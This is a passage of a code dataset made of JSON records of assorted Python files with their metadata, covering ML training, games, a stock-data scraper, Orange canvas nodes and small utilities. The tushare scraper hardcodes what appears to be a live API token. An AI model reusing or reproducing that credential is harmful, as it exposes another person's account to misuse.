dirs, files in os.walk('../../../data/corn_belt'):\n    img_list = files\n    break\nbatch_size=100\ndataloader = tile_dataloader(img_list, batch_size)\n\nlr = 1e-3\noptimizer = optim.Adam(model.parameters(), lr=lr, betas=(.9,.999))\n\nepochs=2\nsave_models=True\nmodel_dir = 'classifier_models'\n\nif not os.path.exists(model_dir):\n    os.makedirs(model_dir)\n    \nt0 = time()\nprint('Begin Classifier Training......')\nfor epoch in range(0, epochs):\n    running_loss = 0.0\n    for idx, data in enumerate(dataloader):\n        tile, label = data\n        tile, label = prep_tile(tile, label, device=device)\n        optimizer.zero_grad()\n        print(tile)\n        outputs = model(tile.float().cuda())\n        loss = model.loss()\n        loss = loss(outputs, 
label.long())\n        loss.backward()\n        optimizer.step()\n        running_loss += loss.item()\n        print(\"Batch Loaded\")\n        if idx % 10 == 9:    # print every 10 mini-batches\n            print('[%d, %5d] loss: %.3f' %\n                  (epoch + 1, idx + 1, running_loss / 10))\n            running_loss = 0.0\n    \n\n", "repo_name": "tommymcarver/Tile2Vec-Sentinel2-Classifier", "sub_path": "mlpClassifier.py", "file_name": "mlpClassifier.py", "file_ext": "py", "file_size_in_byte": 2679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.cuda.is_available", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 26, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 32, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 32, "usage_type": "call"}, {"api_name": "net.Net", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 58, "usage_type": "call"}, {"api_name": "classifierLoading.tile_dataloader", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 65, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "src.training.prep_tile", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13921972302", "text": "from typing import List\nimport random\n#task1\n#print(max(int(input()), (int(input())), (int(input()))))\n#task2\ndef listazas(lista: list) -> list:\n    lista2: List['int'] = list()\n    atlag = sum(lista) // len(lista)\n    for i in range(len(lista)):\n        if lista[i] < atlag:\n            lista2.append(lista[i])\n    return lista2\nprint(listazas([1123452342, 546876976452, 43564745363, 345635354, 35635636, 35633656, 36535637, 7969678]))\n\n#task3\ndef kilencven():\n    lista1: List['int'] = list()\n    for i in range(1 ,91):\n        lista1.append((i))\n    for x in range(200):\n        random1: int = random.randint(0, len(lista1) - 1)\n        random2: int = random.randint(0, len(lista1) - 1)\n        lista1[random1], lista1[random2] = lista1[random2], lista1[random1]\n", "repo_name": "csany2020c/MyGame", "sub_path": "Hazi/KornelHazi.py", "file_name": "KornelHazi.py", "file_ext": "py", "file_size_in_byte": 793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": 
"random.randint", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "40473466579", "text": "import pygame\nfrom projectile import Projectile\n\nclass Boss(pygame.sprite.Sprite):\n\n def __init__(self, game):\n super().__init__()\n self.game = game\n self.health = 400\n self.max_health = 400\n self.attack = 10\n self.velocity = 5\n self.count = 1\n\n self.tt_projectiles1 = pygame.sprite.Group()\n self.tt_projectiles2 = pygame.sprite.Group()\n self.nb_projectiles = 20\n \n\n self.image = pygame.image.load(\"images/Boss1.png\").convert_alpha()\n self.image = pygame.transform.smoothscale(self.image, (256,256))\n self.rect = self.image.get_rect()\n \n self.rect.x = 450\n self.rect.y = 400\n self.yg = (self.rect.y)-100\n self.yd = self.rect.y + 100\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n\n def damage(self, amount):\n #infliger les degats\n self.health -= amount\n\n #verifier si ses pv <= 0\n if self.health <= 0: \n self.game.add_score(100)\n \n #Supprimer le monstre\n self.game.tt_boss.remove(self) #fais gaffe ça supprime tous les monstres \n #ajout du score\n \n def update_health_bar(self, surface):\n \n bar_color = (111, 210, 46)\n\n back_bar_color = (60,63,60)\n \n\n bar_position = [self.rect.x - 15, self.rect.y, self.health ,5]\n \n back_bar_position = [self.rect.x - 15, self.rect.y, self.max_health ,5]\n\n pygame.draw.rect(surface, back_bar_color, back_bar_position)\n pygame.draw.rect(surface,bar_color, bar_position)\n \n \n def deplaM(self):\n if self.rect.y == self.yd:\n self.count *= -1\n if self.rect.y == self.yg:\n self.count *= -1\n\n if self.count > 0 :\n if self.rect.y < self.yd:\n if not self.game.check_collisionMonstre(self,self.game.tt_players):\n self.rect.y += self.velocity\n #si le monstre est en collision avec le joueur il inflige des degats\n else: \n self.game.player.damage(self.attack)\n if self.count < 0 :\n if self.rect.y > self.yg:\n if not self.game.check_collisionMonstre(self,self.game.tt_players):\n self.rect.y -= self.velocity\n else: \n self.game.player.damage(self.attack)\n\n\n def lancer_projectile1(self):\n self.tt_projectiles1.add(Projectile(self, \"boss\"))\n \n def lancer_projectile2(self):\n self.tt_projectiles2.add(Projectile(self, \"boss\"))\n", "repo_name": "Americanos33/GameJam2021", "sub_path": "boss.py", "file_name": "boss.py", "file_ext": "py", "file_size_in_byte": 2641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 57, "usage_type": "attribute"}, {"api_name": "projectile.Projectile", 
"line_number": 82, "usage_type": "call"}, {"api_name": "projectile.Projectile", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "19663392453", "text": "#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n\nimport psycopg2 #使用的是PostgreSQL数据库\nimport tushare as ts\nfrom Stocks import *\nfrom HData_holder import *\nimport time,datetime\n\nfrom time import clock\n\nfrom file_interface import *\n\nimport pandas as pd\n\nimport sys\nimport os\n \ntoken='21dddafc47513ea46b89057b2c4edf7b44882b3e92274b431f199552'\npro = ts.pro_api(token)\n\n\ndebug=0\n#debug=1\n\n\ndef update_holder(nowdate):\n codestock_local=stocks.get_codestock_local()\n if debug:\n print(codestock_local)\n\n length=len(codestock_local)\n\n\n for i in range(0,length):\n nowcode=codestock_local[i][0]\n\n maxdate=hdata_holder.db_get_maxdate_of_stock(nowcode)\n if debug:\n print('maxdate:%s, nowdate:%s' % (maxdate, nowdate))\n \n #get start date\n if(maxdate):\n start_date=(maxdate + datetime.timedelta(1)).strftime(\"%Y%m%d\")\n else:#说明从未获取过这只股票的历史数据\n start_date='20180101'\n\n #get end date\n end_date=nowdate.strftime(\"%Y%m%d\")\n\n #get stock_code\n if nowcode[0:1] == '6':\n stock_code_new= nowcode + '.SH'\n else:\n stock_code_new= nowcode + '.SZ'\n\n if debug:\n print('stock_code_new:%s, start_date:%s, end_date:%s' % (stock_code_new, start_date, end_date))\n\n #get data\n hist_data = pro.stk_holdernumber(ts_code=stock_code_new, start_date=start_date, end_date=end_date)\n \n time.sleep(0.6) #fix bug: 抱歉,您每分钟最多访问该接口100次\n\n if hist_data is None:\n if debug:\n print(\"hist_data is None: %d, %s, %s\" % (i,nowcode,codestock_local[i][1]))\n continue\n\n if(len(hist_data) == 0):\n if debug:\n print(\"hist_data length is 0: i=%d, nowcode:%s, nowname:%s \" %(i,nowcode,codestock_local[i][1]))\n continue\n\n hist_data=hist_data.fillna(0)\n\n hist_data=hist_data.drop_duplicates(subset='end_date', keep='first', inplace=False) #delete end_date line with the same data\n\n #handle hist_data\n new_data = pd.DataFrame()\n new_data['record_date'] = hist_data['end_date']\n new_data['stock_code'] = nowcode\n new_data['ann_date'] = hist_data['ann_date']\n new_data['end_date'] = hist_data['end_date'] \n new_data['holder_num'] = hist_data['holder_num'] \n\n new_data['record_date']=new_data['record_date'].apply(lambda x: datetime.datetime.strptime(x,'%Y%m%d'))\n \n hist_data = new_data.set_index('record_date')\n\n if debug:\n print(hist_data.head(10))\n\n hdata_holder.insert_allstock_hdatadate(hist_data)\n\n if debug:\n print(\"2\", maxdate, nowdate, hist_data)\n\nif __name__ == '__main__':\n \n t1 = clock()\n \n nowdate=datetime.datetime.now().date()\n\n stocks=Stocks(\"usr\",\"usr\")\n hdata_holder=HData_holder(\"usr\",\"usr\")\n\n #hdata_holder.db_hdata_date_create()\n\n hdata_holder.db_connect()#由于每次连接数据库都要耗时0.0几秒,故获取历史数据时统一连接\n\n update_holder(nowdate)\n\n t2 = clock()\n\n print(\"t1:%s, t2:%s, delta=%s\"%(t1, t2, t2-t1))\n hdata_holder.db_disconnect()\n", "repo_name": "chntylz/a_stock", "sub_path": "main_holder.py", "file_name": "main_holder.py", "file_ext": "py", "file_size_in_byte": 3273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tushare.pro_api", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", 
"line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 87, "usage_type": "attribute"}, {"api_name": "time.clock", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.clock", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "2119957766", "text": "\"\"\"\n===========\nScheme Node\n===========\n\n\"\"\"\nimport enum\nimport warnings\nfrom typing import Optional, Dict, Any, List, Tuple, Iterable, Union\n\nfrom AnyQt.QtCore import QObject, QCoreApplication\nfrom AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property\n\nfrom ..registry import WidgetDescription, InputSignal, OutputSignal\nfrom .events import NodeEvent\n\n\nclass UserMessage(object):\n \"\"\"\n A user message that should be displayed in a scheme view.\n\n Parameters\n ----------\n contents : str\n Message text.\n severity : int\n Message severity.\n message_id : str\n Message id.\n data : dict\n A dictionary with optional extra data.\n \"\"\"\n #: Severity flags\n Info, Warning, Error = 1, 2, 3\n\n def __init__(self, contents, severity=Info, message_id=\"\", data={}):\n # type: (str, int, str, Dict[str, Any]) -> None\n self.contents = contents\n self.severity = severity\n self.message_id = message_id\n self.data = dict(data)\n\n\nclass SchemeNode(QObject):\n \"\"\"\n A node in a :class:`.Scheme`.\n\n Parameters\n ----------\n description : :class:`WidgetDescription`\n Node description instance.\n title : str, optional\n Node title string (if None `description.name` is used).\n position : tuple\n (x, y) tuple of floats for node position in a visual display.\n properties : dict\n Additional extra instance properties (settings, widget geometry, ...)\n parent : :class:`QObject`\n Parent object.\n\n \"\"\"\n class State(enum.IntEnum):\n \"\"\"\n A workflow node's runtime state flags\n \"\"\"\n #: The node has no state.\n NoState = 0\n\n #: The node is running (i.e. executing a task).\n Running = 1\n\n #: The node has invalidated inputs. This flag is set when:\n #:\n #: * An input link is added or removed\n #: * An input link is marked as pending\n #:\n #: It is set/cleared by the execution manager when the inputs are\n #: propagated to the node.\n Pending = 2\n\n #: The node has invalidated outputs. 
Execution manager should not\n #: propagate this node's existing outputs to dependent nodes until\n #: this flag is cleared.\n Invalidated = 4\n\n #: The node is in a state where it does not accept new signals.\n #: The execution manager should not propagate inputs to this node\n #: until this flag is cleared.\n NotReady = 8\n\n NoState = State.NoState\n Running = State.Running\n Pending = State.Pending\n Invalidated = State.Invalidated\n NotReady = State.NotReady\n\n def __init__(self, description, title=None, position=None,\n properties=None, parent=None):\n # type: (WidgetDescription, str, Tuple[float, float], dict, QObject) -> None\n super().__init__(parent)\n self.description = description\n\n if title is None:\n title = description.name\n\n self.__title = title\n self.__position = position or (0, 0)\n self.__progress = -1\n self.__processing_state = 0\n self.__tool_tip = \"\"\n self.__status_message = \"\"\n self.__state_messages = {} # type: Dict[str, UserMessage]\n self.__state = SchemeNode.NoState # type: Union[SchemeNode.State, int]\n self.properties = properties or {}\n\n def input_channels(self):\n # type: () -> List[InputSignal]\n \"\"\"\n Return a list of input channels (:class:`InputSignal`) for the node.\n \"\"\"\n return list(self.description.inputs)\n\n def output_channels(self):\n # type: () -> List[OutputSignal]\n \"\"\"\n Return a list of output channels (:class:`OutputSignal`) for the node.\n \"\"\"\n return list(self.description.outputs)\n\n def input_channel(self, name):\n # type: (str) -> InputSignal\n \"\"\"\n Return the input channel matching `name`. Raise a `ValueError`\n if not found.\n \"\"\"\n for channel in self.input_channels():\n if channel.id == name:\n return channel\n # Fallback to channel names for backward compatibility\n for channel in self.input_channels():\n if channel.name == name:\n return channel\n raise ValueError(\"%r is not a valid input channel for %r.\" % \\\n (name, self.description.name))\n\n def output_channel(self, name):\n # type: (str) -> OutputSignal\n \"\"\"\n Return the output channel matching `name`. 
Raise a `ValueError`\n        if not found.\n        \"\"\"\n        for channel in self.output_channels():\n            if channel.id == name:\n                return channel\n        # Fallback to channel names for backward compatibility\n        for channel in self.output_channels():\n            if channel.name == name:\n                return channel\n        raise ValueError(\"%r is not a valid output channel for %r.\" % \\\n                         (name, self.description.name))\n\n    #: The title of the node has changed\n    title_changed = Signal(str)\n\n    def set_title(self, title):\n        \"\"\"\n        Set the node title.\n        \"\"\"\n        if self.__title != title:\n            self.__title = title\n            self.title_changed.emit(self.__title)\n\n    def _title(self):\n        \"\"\"\n        The node title.\n        \"\"\"\n        return self.__title\n\n    title: str\n    title = Property(str, _title, set_title)  # type: ignore\n\n    #: Position of the node in the scheme has changed\n    position_changed = Signal(tuple)\n\n    def set_position(self, pos):\n        \"\"\"\n        Set the position (``(x, y)`` tuple) of the node.\n        \"\"\"\n        if self.__position != pos:\n            self.__position = pos\n            self.position_changed.emit(pos)\n\n    def _get_position(self):\n        \"\"\"\n        ``(x, y)`` tuple containing the position of the node in the scheme.\n        \"\"\"\n        return self.__position\n\n    position: Tuple[float, float]\n    position = Property(tuple, _get_position, set_position)  # type: ignore\n\n    #: Node's progress value has changed.\n    progress_changed = Signal(float)\n\n    def set_progress(self, value):\n        \"\"\"\n        Set the progress value.\n        \"\"\"\n        if self.__progress != value:\n            self.__progress = value\n            self.progress_changed.emit(value)\n\n    def _progress(self):\n        \"\"\"\n        The current progress value. -1 if progress is not set.\n        \"\"\"\n        return self.__progress\n\n    progress: float\n    progress = Property(float, _progress, set_progress)  # type: ignore\n\n    #: Node's processing state has changed.\n    processing_state_changed = Signal(int)\n\n    def set_processing_state(self, state):\n        \"\"\"\n        Set the node processing state.\n        \"\"\"\n        self.set_state_flags(SchemeNode.Running, bool(state))\n\n    def _processing_state(self):\n        \"\"\"\n        The node processing state, 0 for not processing, 1 the node is busy.\n        \"\"\"\n        return int(bool(self.state() & SchemeNode.Running))\n\n    processing_state: int\n    processing_state = Property(  # type: ignore\n        int, _processing_state, set_processing_state)\n\n    def set_tool_tip(self, tool_tip):\n        if self.__tool_tip != tool_tip:\n            self.__tool_tip = tool_tip\n\n    def _tool_tip(self):\n        return self.__tool_tip\n\n    tool_tip: str\n    tool_tip = Property(str, _tool_tip, set_tool_tip)  # type: ignore\n\n    #: The node's status tip has changed\n    status_message_changed = Signal(str)\n\n    def set_status_message(self, text):\n        # type: (str) -> None\n        \"\"\"Set a short status message.\"\"\"\n        if self.__status_message != text:\n            self.__status_message = text\n            self.status_message_changed.emit(text)\n\n    def status_message(self):\n        # type: () -> str\n        \"\"\"A short status message summarizing the current node state.\"\"\"\n        return self.__status_message\n\n    #: The node's state message has changed\n    state_message_changed = Signal(UserMessage)\n\n    def set_state_message(self, message):\n        # type: (UserMessage) -> None\n        \"\"\"\n        Set a message to be displayed by a scheme view for this node.\n        \"\"\"\n        if message.message_id is not None:\n            self.__state_messages[message.message_id] = message\n            self.state_message_changed.emit(message)\n        else:\n            warnings.warn(\n                \"'message' with no id was ignored. \"\n                \"This will raise an error in the future.\",\n                FutureWarning, stacklevel=2\n            )\n\n    def clear_state_message(self, message_id):\n        # type: (str) -> None\n        \"\"\"\n        Clear (remove) a message with `message_id`.\n\n        :attr:`state_message_changed` signal will be emitted with an empty\n        message for the `message_id`.\n        \"\"\"\n        if message_id in self.__state_messages:\n            # emit an empty message\n            m = self.__state_messages[message_id]\n            m = UserMessage(\"\", m.severity, m.message_id)\n            self.__state_messages[message_id] = m\n            self.state_message_changed.emit(m)\n            del self.__state_messages[message_id]\n\n    def state_message(self, message_id):\n        # type: (str) -> Optional[UserMessage]\n        \"\"\"\n        Return a message with `message_id` or None if a message with that\n        id does not exist.\n        \"\"\"\n        return self.__state_messages.get(message_id, None)\n\n    def state_messages(self):\n        # type: () -> Iterable[UserMessage]\n        \"\"\"\n        Return a list of all state messages.\n        \"\"\"\n        return self.__state_messages.values()\n\n    state_changed = Signal(int)\n\n    def set_state(self, state):\n        # type: (Union[State, int]) -> None\n        \"\"\"\n        Set the node runtime state flags\n\n        Parameters\n        ----------\n        state: SchemeNode.State\n        \"\"\"\n        if self.__state != state:\n            curr = self.__state\n            self.__state = state\n            QCoreApplication.sendEvent(\n                self, NodeEvent(NodeEvent.NodeStateChange, self)\n            )\n            self.state_changed.emit(state)\n            if curr & SchemeNode.Running != state & SchemeNode.Running:\n                self.processing_state_changed.emit(\n                    int(bool(state & SchemeNode.Running))\n                )\n\n    def state(self):\n        # type: () -> Union[State, int]\n        \"\"\"\n        Return the node runtime state flags.\n        \"\"\"\n        return self.__state\n\n    def set_state_flags(self, flags, on):\n        # type: (Union[State, int], bool) -> None\n        \"\"\"\n        Set the specified state flags on/off.\n\n        Parameters\n        ----------\n        flags: SchemeNode.State\n            Flag to modify\n        on: bool\n            Turn the flag on or off\n        \"\"\"\n        if on:\n            state = self.__state | flags\n        else:\n            state = self.__state & ~flags\n        self.set_state(state)\n\n    def test_state_flags(self, flag):\n        # type: (State) -> bool\n        \"\"\"\n        Return True/False if the runtime state flag is set.\n\n        Parameters\n        ----------\n        flag: SchemeNode.State\n\n        Returns\n        -------\n        val: bool\n        \"\"\"\n        return bool(self.__state & flag)\n\n    def __str__(self):\n        return \"SchemeNode(description_id=%r, title=%r, ...)\" % \\\n            (str(self.description.id), self.title)\n\n    def __repr__(self):\n        return str(self)\n\n    def __getstate__(self):\n        return self.description, \\\n               self.__title, \\\n               self.__position, \\\n               self.properties, \\\n               self.parent()\n\n    def __setstate__(self, state):\n        self.__init__(*state)\n", "repo_name": "biolab/orange-canvas-core", "sub_path": "orangecanvas/scheme/node.py", "file_name": "node.py", "file_ext": "py", "file_size_in_byte": 11750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "41", "api": [{"api_name": "AnyQt.QtCore.QObject", "line_number": 44, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 62, "usage_type": "attribute"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 163, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 180, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 200, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 203, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 220, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 223, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 238, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 249, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 252, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 267, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 278, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 315, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.QCoreApplication.sendEvent", "line_number": 329, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.QCoreApplication", "line_number": 329, "usage_type": "name"}, {"api_name": "events.NodeEvent", "line_number": 330, "usage_type": "call"}, {"api_name": "events.NodeEvent.NodeStateChange", "line_number": 330, "usage_type": "attribute"}]}
+{"seq_id": "37947510753", "text": "## Using heapq\n# import heapq\n\n# def bfs(n):\n#     queue = []\n#     max_num = 100001\n#     visited = [-1] * max_num\n#     visited[n] = 0\n#     dx = [-1, 1]\n#     heapq.heappush(queue, [visited[n], n])\n\n#     while queue:\n#         cnt, x = heapq.heappop(queue)\n#         if x == k:\n#             return cnt\n#         nx = x * 2\n#         if nx < max_num and visited[nx] == -1:\n#             if visited[nx] == -1:\n#                 if nx == k:\n#                     return cnt\n#                 visited[nx] = cnt\n#                 heapq.heappush(queue, [cnt, nx])\n\n#         for i in range(2):\n#             nx = x + dx[i]\n#             if 0 <= nx < max_num and visited[nx] == -1:\n#                 if nx == k:\n#                     return cnt + 1\n#                 visited[nx] = cnt + 1\n#                 heapq.heappush(queue, [cnt + 1, nx])\n\n\n# n, k = map(int, input().split())\n# print(bfs(n))\n\n\n## Using deque\nfrom collections import deque\n\n\ndef bfs(n):\n    dq = deque([n])\n    visited[n] = 0\n\n    while dq:\n        dx = [-1, 1]\n        x = dq.popleft()\n        nx = x * 2\n        if nx < max_num and visited[nx] == -1:\n            visited[nx] = visited[x]\n            dq.appendleft(nx)\n            if nx == k:\n                return visited[x]\n\n        for i in range(2):\n            nx = x + dx[i]\n            if 0 <= nx < max_num and visited[nx] == -1:\n                visited[nx] = visited[x] + 1\n                dq.append(nx)\n                if nx == k:\n                    return visited[x] + 1\n\n\nn, k = map(int, input().split())\n\nmax_num = 100001\nvisited = [-1] * max_num\n\nbfs(n)\nprint(visited[k])\n", "repo_name": "algoitssm/algorithm_sangjoon", "sub_path": "Baekjoon/13549.py", "file_name": "13549.py", "file_ext": "py", "file_size_in_byte": 1611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.deque", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "15514955160", "text": "import numpy as np\nfrom shapely.geometry import Polygon, Point, LineString\n\ndef extract_polygons_and_centers(data):\n    # Build a set of polygons from the obstacle data\n    polygons = []\n    centers = []\n    for i in range(data.shape[0]):\n        north, east, alt, d_north, d_east, d_alt = data[i, :]\n        obstacle = [north - d_north, north + d_north, east - d_east, east + d_east]\n        corners = [(obstacle[0], obstacle[2]), (obstacle[0], obstacle[3]), (obstacle[1], obstacle[3]), (obstacle[1], obstacle[2])] \n        height = alt + d_alt\n\n        poly = Polygon(corners)\n        polygons.append((poly, height))\n\n        c = [north, east]\n        centers.append(c)\n    return polygons, np.asarray(centers)\n\ndef get_samples(data):\n    xmin = np.min(data[:, 0] - data[:, 3])\n    xmax = np.max(data[:, 0] + data[:, 3])\n\n    ymin = np.min(data[:, 1] - data[:, 4])\n    
ymax = np.max(data[:, 1] + data[:, 4])\n\n zmin = 0\n # Limit the z axis for the visualization\n zmax = 10\n\n print(\"X\")\n print(\"min = {0}, max = {1}\\n\".format(xmin, xmax))\n\n print(\"Y\")\n print(\"min = {0}, max = {1}\\n\".format(ymin, ymax))\n\n print(\"Z\")\n print(\"min = {0}, max = {1}\".format(zmin, zmax))\n\n num_samples = 1000\n\n xvals = np.random.uniform(xmin, xmax, num_samples)\n yvals = np.random.uniform(ymin, ymax, num_samples)\n zvals = np.random.uniform(zmin, zmax, num_samples)\n\n samples = list(zip(xvals, yvals, zvals))\n return samples\n", "repo_name": "irvingvasquez/ra_programas", "sub_path": "planif_basada_en_muestreo/muestreo.py", "file_name": "muestreo.py", "file_ext": "py", "file_size_in_byte": 1480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "shapely.geometry.Polygon", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "20502608077", "text": "from django.forms import ModelForm\nfrom .models import BlogPosts\n\nclass PostCreationForm(ModelForm):\n class Meta:\n model = BlogPosts\n fields = ['title','text','photo','photoAlt','published']\n labels = {\n \"title\":\"Post title:\",\n \"text\":\"Full text:\",\n \"photo\":\"Photo to post:\",\n \"photoAlt\":\"Alt to photo:\",\n \"published\":\"Should the post be public:\"\n }", "repo_name": "LukaszKwiatkowski94/Swimming-Pool-Django-Concept", "sub_path": "apps/blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "name"}, {"api_name": "models.BlogPosts", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "20472859189", "text": "import gettext\nfrom jinja2 import (\n Environment,\n FileSystemLoader,\n)\n\ntry:\n from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n\nclass Renderer:\n def __init__(self, content_dir='../../content/', output_dir='../../static/html'):\n loader = FileSystemLoader(searchpath='templates')\n self.defaults = {'translations': {}, 'sections': {'en': [], 'fr': []}}\n self.env = Environment(loader=loader, extensions=['jinja2.ext.i18n'])\n self.translations = {\n 'en': gettext.translation('jvk', 'locales', languages=['en']),\n 'fr': gettext.translation('jvk', 'locales', languages=['fr']),\n }\n self.env.install_null_translations()\n self.queue = []\n self.content_dir = content_dir\n self.output_dir = output_dir\n\n def read_content(self, source):\n with open(self.content_dir + source) as content_file:\n return content_file.read()\n\n def 
add(self, path, *args, **kwargs):\n        if 'section' in kwargs and kwargs['section']:\n            lang = kwargs['lang']\n            section = {'href': path,\n                       'title': kwargs['title']}\n            try:\n                section.update(kwargs['section'])\n            except:\n                pass\n            self.defaults['sections'][lang].append(section)\n        args = tuple([path]+list(args))\n        self.queue.append((args, kwargs))\n\n\n    def render_all(self):\n        for args, kwargs in self.queue:\n            if 'lang' in kwargs:\n                translations = self.translations[kwargs['lang']]\n                self.env.install_gettext_translations(translations)\n            self.render(*args, **kwargs)\n\n    def render(self, path, template, **kwargs):\n        kwargs = {**self.defaults, **kwargs}\n        page = self.env.get_template(template).render(path=path, **kwargs)\n        with open(self.output_dir + path + '.html', 'w') as out:\n            out.write(page)\n\n\nif __name__ == \"__main__\":\n    import argparse\n    argparser = argparse.ArgumentParser(description='Render my resume.')\n    argparser.add_argument('input', type=argparse.FileType('r'))\n    argparser.add_argument('out', type=argparse.FileType('w'))\n\n    args = argparser.parse_args()\n    _input = args.input\n    out = args.out\n    out.write(render(_input))\n", "repo_name": "odontomachus/jvk", "sub_path": "src/jvk/renderer.py", "file_name": "renderer.py", "file_ext": "py", "file_size_in_byte": 2350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "jinja2.FileSystemLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 16, "usage_type": "call"}, {"api_name": 